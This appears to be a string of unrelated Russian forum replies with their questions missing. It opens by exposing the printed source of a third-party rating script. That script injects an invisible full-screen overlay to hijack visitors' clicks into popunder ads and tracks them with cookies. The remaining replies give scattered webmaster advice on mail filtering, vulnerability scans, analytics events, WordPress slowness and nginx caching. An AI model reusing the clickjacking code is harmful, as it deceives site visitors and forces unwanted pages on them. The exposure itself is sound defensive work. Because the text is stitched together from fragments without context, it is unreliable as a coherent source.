вот он:
<script type="text/javascript" src="http://www.ukrmir.net/top_rating.php?cid=363&f=0&t=1&g=1&stats=today"></script>
добавляет этот код:
<div id="casdykasdfkl6453678bfajgf" style="position: fixed; background: #000; left: -2%; top: -2%; width: 104%; height: 104%; z-index: 100000000000; opacity: 0.0;" onclick="r24_start('http://www.gusto.ua/');"></div>
содержимое скрипта:
function r24_goto(qa) {function substr_count( haystack, needle, offset, length ) {var pos = 0, cnt = 0;if(isNaN(offset)) offset = 0;if(isNaN(length)) length = 0;offset--;while( (offset = haystack.indexOf(needle, offset+1)) != -1 ){if(length > 0 && (offset+needle.length) > length){return false;} else{cnt++;}}return cnt;}TRurl_adv = qa;var ag = TRe=navigator.userAgent.toLowerCase();if (substr_count(ag,'mozilla')&&!substr_count(ag,'chrome')&&!substr_count(ag,'safari')&&!substr_count(ag,'yabrowser')&&!substr_count(ag,'opera')) {b = window.open("about:blank","win"+Math.floor(9999999*Math.random())+1,"toolbar=0,scrollbars=1,location=1,statusbar=1,menubar=0,resizable=1,top=0,left=0,width="+window.screen.width+"px,height="+window.screen.height+"px");with(b)opener.window.focus(),b.location=TRurl_adv,"undefined"!=typeof window.mozPaintCount&&window.open("about:blank").close(),b.blur();} else {var b=document.createElement("a");b.href=TRurl_adv;b.target="_blank";var c=document.createEvent("MouseEvents");c.initMouseEvent("click",!0,!0,window,1,0,0,0,0,!0,!1,!1,!1,1,null);b.dispatchEvent(c);}}function r24_start(qa) {r24_goto(qa);document.getElementById('casdykasdfkl6453678bfajgf').style.display = 'none';}function r24_opwn(count,qa) {function gC(name) {var matches = document.cookie.match(new RegExp("(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)"));return matches ? decodeURIComponent(matches[1]) : undefined;}function sC(name, value, options) {options = options || {};var expires = options.expires;if (typeof expires == "number" && expires) {var d = new Date();d.setTime(d.getTime() + expires*1000);expires = options.expires = d;}if (expires && expires.toUTCString) {options.expires = expires.toUTCString();}value = encodeURIComponent(value);var updatedCookie = name+"="+value+"; path=/";for(var propName in options) {updatedCookie += "; " + propName;var propValue = options[propName];if (propValue !== true) {updatedCookie += "=" + propValue;}}document.cookie = updatedCookie;}function dC(name) {setCookie(name, "", { expires: -1 })}var date = new Date(); var today = date.getDate();if (gC('opwc') == undefined) {sC('opwc',0,{expires: 76400});}if (gC('opwd') == undefined) {sC('opwd',0,{expires: 76400});}var c = gC('opwc'); c = (c-0); var d = gC('opwd'); d = (d-0);if (d!=today) {c = (c-0+1);sC('opwc',c,{expires: 76400});if (c>count) {sC('opwd',today,{expires: 76400});el = '<div id="casdykasdfkl6453678bfajgf" style="position: fixed; background: #000; left: -2%; top: -2%; width: 104%; height: 104%; z-index: 100000000000; opacity: 0.0;" onclick="r24_start(\''+qa+'\');"></div>';document.write(el);}}}r24_opwn(0,'http://www.gusto.ua/');
А почтовый сервер у вас локальный? Тогда лучше на уровне почтового сервера и настроить:
http://habrahabr.ru/post/114852/
Выбирайте те, которые дают полный бэкап скачать :)
Нет, это только от SQL-инъекций поможет, а у него скан на bash уязвимость
ga('send', 'event', {
'New Visitor': location.pathname,
'что-то-ещё': 'значение'
});
https://developers.google.com/analytics/devguides/collection/analyticsjs/advanced
Да просто сканят на уязвимость, которую вам привели выше. Таких сканов обычно тучи бывают разных, расслабьтесь, все нормально.
Хотите обезопаситься от подобных сканов - ModSecurity + OWASP CoreRuleSet
Да ладно, 15 запросов в сек (причем я не уверен, что браузер их действительно с такой частотой отправляет) - ерунда для php с апачем. Но не для кривых запросов на MySQL 🤪
Надо оптимизровать SQL-запросы, наверняка есть какой-то плагин wordpress который затормаживает работу. Можете попробовать отключать плагины по очереди и тестировать через F5 :)
Кэши, лимиты - это потом, после оптимизации SQL.
утечки памяти? показали бы список процессов, которые выполняются для начала что-ли
Также вам пригодится далее (для "Исправьте обязательно: Используйте кеш браузера"):
location ~* \.(jpg|jpeg|png|gif|ico|css|js)$ {
expires max;
}
;)